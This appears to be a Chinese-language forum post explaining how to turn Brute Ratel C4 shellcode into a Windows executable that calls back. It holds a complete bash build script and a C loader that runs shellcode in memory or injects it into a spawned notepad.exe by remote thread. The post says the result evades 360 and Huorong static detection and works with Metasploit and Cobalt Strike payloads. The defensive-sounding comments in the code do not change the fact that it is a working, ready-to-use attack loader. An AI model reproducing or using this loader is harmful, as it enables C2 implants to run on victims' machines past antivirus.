brc4 1.2.2生成exe无法回连解决方法
将生成的bin文件转换为exe即可
贴码
bincompiler.sh
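#!/bin/bash
# Build wrapper for runshellcode.c (expected in the current directory):
# converts the given .bin into a C header with `xxd -i` and cross-compiles
# with the mingw-w64 toolchain selected by the first argument.
#
# Usage:       binCompiler.sh 86/64 <shellcode.bin> <output.exe>
# Requires:    xxd, i686-w64-mingw32-gcc / x86_64-w64-mingw32-gcc
# Exit status: 0 on success; 1 on bad arguments, missing xxd, or a failed
#              copy/xxd/compile step (the original printed "+ 成功" and
#              exited 0 regardless of the compiler's result).

#######################################
# Print the usage line (to stdout, as the original did).
#######################################
usage() {
  echo "需要提供 shellcode 二进制文件进行编译。例如: binCompiler.sh 86/64 <shellcode.bin> <output.exe>"
}

#######################################
# Map the architecture argument to a compiler name.
# Arguments: $1 - "86" or "64"
# Outputs:   compiler executable name on stdout
# Returns:   1 for any other value (the original silently built x64 then)
#######################################
compiler_for() {
  case "$1" in
    86) printf '%s\n' i686-w64-mingw32-gcc ;;
    64) printf '%s\n' x86_64-w64-mingw32-gcc ;;
    *) return 1 ;;
  esac
}

#######################################
# Run the copy -> xxd -> compile pipeline inside a private work directory.
# Arguments: $1 - compiler, $2 - input .bin, $3 - output .exe, $4 - work dir
# Returns:   0 on success, 1 as soon as any step fails
#######################################
build() {
  local compiler="$1" input="$2" output="$3" workdir="$4"
  cp -f -- "$input" "$workdir/shellcode.bin" || return 1
  # xxd -i derives the C identifiers (shellcode_bin, shellcode_bin_len) from
  # the path it is given, so it must be run on the bare name from inside the
  # work dir rather than on "$workdir/shellcode.bin".
  (cd "$workdir" && xxd -i shellcode.bin > shellcode.h) || return 1
  # -I lets runshellcode.c's #include "shellcode.h" find the generated header
  # without writing into the current directory.
  "$compiler" runshellcode.c -I "$workdir" -o "$output" -lws2_32 || return 1
}

#######################################
# Entry point.
# Arguments: $1 - 86/64, $2 - shellcode .bin, $3 - output .exe
# Returns:   0 on success, 1 on any error
#######################################
main() {
  local input output compiler workdir rc
  if [ $# -lt 3 ]; then
    usage
    return 1
  fi
  input="$2"
  output="$3"
  if [ ! -f "$input" ]; then
    echo "路径不存在: $input"
    return 1
  fi
  if ! compiler=$(compiler_for "$1"); then
    usage
    return 1
  fi
  if ! command -v xxd >/dev/null 2>&1; then
    echo "需要安装 xxd" >&2
    return 1
  fi
  # Private scratch dir instead of shellcode.bin/shellcode.h in the current
  # directory, which the original overwrote and then rm -rf'ed.
  workdir=$(mktemp -d) || return 1
  echo "正在编译 x$1"
  rc=0
  build "$compiler" "$input" "$output" "$workdir" || rc=1
  rm -rf -- "$workdir"
  if [ "$rc" -eq 0 ]; then
    echo "+ 成功"
  else
    echo "编译失败" >&2
  fi
  return "$rc"
}

main "$@"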
runshellcode.c
#include <windows.h>
#include <stdio.h>
#include <winternl.h>
#include "shellcode.h"
/*
 * Entry point of the loader that bincompiler.sh builds around shellcode.h.
 *
 * The header comes from `xxd -i shellcode.bin`, which is where the
 * `shellcode_bin` array and the `shellcode_bin_len` count are defined.
 *
 * Two modes, selected only by the argument count (argv contents are never
 * read):
 *   argc == 1  -> the buffer is copied into a fresh RW allocation in this
 *                 process, changed to RX and called directly.
 *   argc  > 1  -> a notepad.exe child is started, the buffer is written
 *                 into it, changed to RX, and run on a remote thread.
 *
 * From a detection standpoint both paths are the textbook sequence that
 * memory-scanning and API-telemetry rules key on: private RW allocation,
 * write, RW->RX protection change, then execution from that region
 * (CreateRemoteThread into a freshly created process in the second case).
 * Apart from CreateProcessA, no call has its return value checked, and the
 * child's process/thread handles are never closed.
 */
int main(int argc, char* argv[]) {
    if (argc == 1) {
        DWORD lpThreadId = 0;   /* declared but never used in this branch */
        DWORD flOldProtect = 0;
        /* sizeof(shellcode_bin) equals shellcode_bin_len for an xxd-generated
           array. A NULL result (allocation failure) is not checked and would
           fault in the memcpy below. */
        LPVOID addressPointer = VirtualAlloc(NULL, sizeof(shellcode_bin), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
        memcpy(addressPointer, shellcode_bin, shellcode_bin_len);
        /* RW -> RX before the call, so the region is never mapped RWX. */
        VirtualProtect(addressPointer, shellcode_bin_len, PAGE_EXECUTE_READ, &flOldProtect);
        ((void(*)())addressPointer)();
        /* (HANDLE)-1 is the current-process pseudo-handle and (DWORD)-1 is
           INFINITE: this never returns, keeping the process alive if the
           call above comes back. */
        WaitForSingleObject((HANDLE)-1, -1);
    } else {
        STARTUPINFOA sinfo = {0};
        sinfo.cb = sizeof(sinfo);
        PROCESS_INFORMATION pinfo = {0};
        /* Child starts running normally (dwCreationFlags == 0, not suspended)
           with handle inheritance enabled. Only this call's result is checked. */
        if (CreateProcessA(NULL, "notepad.exe", NULL, NULL, TRUE, 0, NULL, NULL, &sinfo, &pinfo)) {
            /* Unchecked: a NULL here is passed straight on to the calls below. */
            LPVOID addressPointer = VirtualAllocEx(pinfo.hProcess, NULL, sizeof(shellcode_bin), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
            /* lpNumberOfBytesWritten is NULL, so a short write goes unnoticed. */
            WriteProcessMemory(pinfo.hProcess, addressPointer, shellcode_bin, shellcode_bin_len, 0);
            printf("pid: %lu\n", pinfo.dwProcessId);
            printf("Allocated: %p\n", addressPointer);
            DWORD tID = 0;
            DWORD flOldProtect = 0;
            VirtualProtectEx(pinfo.hProcess, addressPointer, shellcode_bin_len, PAGE_EXECUTE_READ, &flOldProtect);
            /* Blocks on stdin until a key is pressed: a manual pause between
               the memory writes above and the thread start below. */
            getchar();
            CreateRemoteThread(pinfo.hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)addressPointer, NULL, 0, &tID);
            printf("tID: %lu\n", tID);
            /* pinfo.hProcess / pinfo.hThread are never closed. */
        }
    }
    return 0;
}
使用方法:将两个文件放在同一个文件夹下
binCompiler.sh 86/64 <shellcode.bin> <output.exe>
实际效果:生成的exe可以过360和火绒静态检测,过不了360动态检测,可以正常上线
当然了,通过msf或者Cobalt Strike生成的bin文件也可以使用该方法进行转换,但是要注意系统位数。
注意:需要安装xxd